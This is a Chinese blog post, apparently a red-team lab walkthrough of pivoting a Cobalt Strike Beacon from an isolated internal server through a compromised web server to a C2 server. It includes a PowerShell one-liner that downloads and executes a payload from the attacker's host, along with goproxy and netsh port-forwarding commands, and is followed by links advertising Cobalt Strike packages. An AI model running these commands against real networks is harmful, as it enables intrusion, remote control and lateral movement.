如何创建http端口监听_Cobalt Strike之内网端口转发一

最新推荐文章于 2024-02-03 16:07:26 发布
最新推荐文章于 2024-02-03 16:07:26 发布
阅读量1.1k 收藏 1
点赞数
文章标签: 如何创建http端口监听 端口监听工具 设置了端口转发仍然无法链接
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39996234/article/details/111283659
版权

TD;LR

在做域内网横向实验的过程中,在控制了域内一台服务器/终端的情况下,通过将Cobalt Strike的socks4a代理,将Beacon shell转发到msf中。通过msf的漏洞利用模块拿到了另一台内网的服务器/终端,此内网的服务器/终端无法连接互联网,只能访问已经控制了的那台服务器。

如果要将一台内网无法连接互联网的服务器/终端反弹回Cobalt Strike,此内网服务器必须需要访问互联网,那么就需要结合端口转发的功能来达到目的。

由于这些知识也刚学习,当时就没把这个实验继续做下去了。

一段时间后,浏览了不少C/S的文章(文章在后面有参考链接,主要参考了snowming大佬的文章),发现要达到这个目的其实不是很难(前人踩坑,后人乘凉 ?),只需要简单的端口转发就可以做的到。

实验环境

windows2012 - webserver

ip1:10.10.10.144

ip2:192.168.15.163

windows 2008 - fileserver

ip:10.10.10.145

cobalt strike 团队服务器 - VPS

ip:211.1.1.181

拓扑图如下:

eb6ab7907d5909c30cdc6d800009cc54.png

注意:VPS不能直接访问到10.10.10.145,10.10.10.145也不能直接出网,这里就是解决如何使10.10.10.145出网,在其上执行shell后反弹回CS服务器。

思路及操作

结合代理以及转发功能,在WEBSERVER上操作。

3a21913e8bcc79ab126930e6701aefc3.png

上线路径:10.10.10.145 → 10.10.10.144:80(HTTP代理)→ 192.168.15.163:8080(端口转发) → 211.1.1.181(监听器上线)

实操演示

VPS连接WEBSERVER服务器,获取立足点

1、连接Cobalt Strike团队服务器,设置好listener。listener设置如下。

723536aa86c9ae5a6a202a72ee948345.png

2、生成payload,利用Scripted Web Delivery(S)模块,payload类型为powershell,端口为80,具体配置看图。

c8d41fa00a1f69d3cf5fc898457b882e.png

5d05cf4958b4dc546d67c30f91e3bd32.png

3、设置完成后,点击launch,即可生成payload。弹出一个窗口,复制如下内容即可。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://211.1.1.181:80/a'))"

4、payload执行完成后,Beacon shell反弹成功。

146ddc0021e7b8fd8396fe926647f1f7.png

5、在WEBSERVER服务器(跳板),设置HTTP代理。使用snowming推荐的goproxy代理工具。

sleep 0upload file # 上传proxy.exe文件shell c:\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

aa8e67583f923e6384f621ba3eb76fae.png

6、在WEBSERVER服务器(跳板)上通过netsh开启端口转发。

shell netsh interface portproxy add v4tov4 listenaddress=10.10.10.144 listenport=80 connectaddress=192.168.15.163 connectport=8080

e830d01f9784e56300bda7ff03123b0c.png

7、netstat -an查看端口监听情况,可以看到8080和80端口都出在监听的状态。

27db19f1820960bc37ebdc1165c0816c.png

8、查看端口转发情况

862ad43a26a90c284f9e1ff27a5d1944.png

9、设置内网代理监听器,http proxy填写内网代理地址。10.10.10.144:80。

4c5aa46f6ca19e10f0b6b390a3b6783f.png

b5a62906ee55e5854a1994da06a2fc5a.png

10、生成payload,利用windows Executable(S)模块(这里有个坑,具体可查看参考链接),选择上面创建好的内网代理监听器。

f9e5a1e66b3be5f740f7c0c853204101.png

11、将payload传到FILESERVER服务器上,执行即可反弹成功。

6c8271d87012256841440f0cb770ee08.png

12、具体的详情可以查看参考链接,有具体的详细细节,感谢大佬的分享。

c1dca00799447d88127bbdca4a7d6ded.png

参考:

http://blog.leanote.com/post/snowming/2ec80f7823e0

weixin_39996234
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cobalt_Strike_reverse_http反向http外部监听器1
08-03
这时候 CobaltStrike 的外部监听器就开始发会作用了,我们可以通过 beacon 内置的派生功能,直接通过 ssh 隧道派生一个 meterprete
Cobalt Strike 4.0 dist_Strike!_Cobalt_cobaltstrike_
10-02
cobalt strike distribution package 4.0
CobaltStrike内网穿透(Socks 隧道)
2301_76227305的博客
02-03 959
众所周知,公网是无法直接访问内网的。但是如果我们控制了一台处于内网和公网边缘的服务器(就是同时有公网IP和私网IP),那么我们便可以利用这个服务器当作跳板,实现对目标内网的访问。之前一直不是很清楚内网与公网这个联系,通过自己搭建环境和配置ip,收获了很多知识。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
为什么监听80端口
tiantiantbtb的博客
05-28 724
80端口http的默认端口 http的站点如果开启的是80端口,访问的时候不用输入端口号 如果监听的是其他端口,访问的时候需要加端口号,如:8080 加端口号,比如域名www.xxxx.com访问的其实就是某公网IP: XXX.XXX.XXX.XX:80端口 通过域名连接DNS服务器找到IP,默认连接该IP下80端口,一般用Nginx作为反向代理处理监听80端口然后转向具体端口 学习记录 ...
http服务】使用命令来查看和停止端口教程。
蓝易云
07-21 243
通过按照上述步骤使用命令来查看和停止端口,您可以轻松地管理正在运行的服务。请确保在停止端口上的服务时,选择正确的端口号,并谨慎操作以避免影响其他正常运行的服务。在Linux系统中,可以使用命令来查看正在监听端口并停止特定端口上运行的服务。这将发送一个终止信号给占用该端口的服务进程,使其停止运行。命令可能需要root权限才能显示所有的进程信息。命令可能需要root权限才能显示所有的进程信息。选项表示显示服务的进程ID(PID)和名称。这将列出所有的监听端口和对应的服务。选项表示仅显示监听状态的端口
HTTP常用端口号与对应的服务说明
weixin_33834679的博客
03-18 1207
常用端口号与对应的服务以及端口关闭 端口简介:本文介绍端口的概念,分类,以及如何关闭/开启一个端口   21端口:21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。   23端口:23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。   25端口:25端口为SMTP(Simple Mail Transf...
springboot服务端接口公网远程调试 - 实现HTTP服务监听端口映射】
日出等日落
05-22 3565
springboot服务端接口公网远程调试 - 实现HTTP服务监听端口映射】
使用HttpListener在服务器端进行监听端口
从_零_开始的专栏
02-27 1万+
public class HttpPortListentHelp     {         private HttpListener _listener;         //负责监听         private Thread _threadWatchPort;         public void StartListening()         {        
cobaltstrike创建监听器与生成后门
热门推荐
yy
06-24 1万+
创建监听器Listener 什么时候需要创建一个监听器了,比如我们拿到一个shell。此时我们就需要用cs生成一个payload传入到目标服务器上来,这个payload要与服务器进行连接就需要服务器先开启一个监听,payload才能找到服务器。 如下进行点击,然后在最下面点击add,进行监听器的添加 页面配置信息如下 name:为监听器名字,可任意 payload:payload类型 HTTP Hosts: shell反弹的主机,也就是我们kali的ip(如果是阿里云,则填阿里云主机的公网ip
C++下最简单的Http服务器
youyicc
08-27 1128
本文采用的实现方式是使用微软的CPPREST SDK方式实现,关于这个库的安装可以参考我的另一篇文章,地址是:https://blog.csdn.net/youyicc/article/details/105971772。测试如下,运行程序,在浏览器中输入"http://127.0.0.1:9092"回车,看到屏幕上打印出"errorCode": 0表示成功。
HttpListener实现简单的Http服务监听
gavinoldmen的专栏
11-18 6566
单独两个程序通过http服务监听完成数据通讯,主要实现思路如下: 1、程序一启动监听固定IP地址(也可以是任意IP)及固定端口监听,收到http请求后对请求内容进行解析,并根据MessageType(逻辑代码)进行不同逻辑处理,根据处理结果告知http请求发送程序结果。 2、程序二启动监听固定IP地址(也可以是任意IP)及固定端口监听,收到http请求后对请求内容进行解析,并根据MessageType(逻辑代码)进行不同逻辑处理,根据处理结果告知http请求发送程序结果。 注意: 1、如果两个程
HTTP监听 非常好用
04-04
NULL 博文链接https://bxh201.iteye.com/blog/1496576
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ...2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd ...默认连接端口50050
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
node-v12.20.1-sunos-x64.tar.xz
最新发布
04-27
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于Springboot+Vue的乡政府管理系统-毕业源码案例设计.zip
04-27
网络技术和计算机技术发展至今,已经拥有了深厚的理论基础,并在现实中进行了充分运用,尤其是基于计算机运行的软件更是受到各界的关注。加上现在人们已经步入信息时代,所以对于信息的宣传和管理就很关键。系统化是必要的,设计网上系统不仅会节约人力和管理成本,还会安全保存庞大的数据量,对于信息的维护和检索也不需要花费很多时间,非常的便利。 网上系统是在MySQL中建立数据表保存信息,运用SpringBoot框架和Java语言编写。并按照软件设计开发流程进行设计实现。系统具备友好性且功能完善。 网上系统在让售信息规范化的同时,也能及时通过数据输入的有效性规则检测出错误数据,让数据的录入达到准确性的目的,进而提升数据的可靠性,让系统数据的错误率降至最低。 关键词:vue;MySQL;SpringBoot框架 【引流】 Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
一名合格的程序猿修炼手册.md
04-27
一名合格的程序猿修炼手册.
5MHz 函数发生器使用说明书
04-27
5MHz 函数发生器使用说明书
cobaltstrike 监听端口冲突
07-28
Cobalt Strike中,如果你将多个HTTPHTTPS和DNS监听器绑定到同一个Cobalt Strike团队服务器上,可能会发生端口冲突。为了避免这种情况,最好将这些监听器绑定到不同的端口上。这样可以确保在你的团队服务器系统中不会发生端口冲突。\[2\]另外,Cobalt Strike还支持使用重定向器来管理监听器。当你设置一个HTTPHTTPS Beacon监听器时,你可以简单地指定一个重定向器IP,而Cobalt Strike不会验证这个信息。如果你提供的主机不是当前团队服务器的IP,Cobalt Strike会将其视为重定向器。你可以使用工具如socat来将服务器转变为重定向器。\[3\]所以,如果你遇到Cobalt Strike监听端口冲突的问题,你可以尝试将监听器绑定到不同的端口,或者使用重定向器来管理监听器。 #### 引用[.reference_title] - *1* *2* *3* [cobalt strick 4.0 系列教程(4)---监听器和基础设施管理](https://blog.csdn.net/qq_41683305/article/details/104983096)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值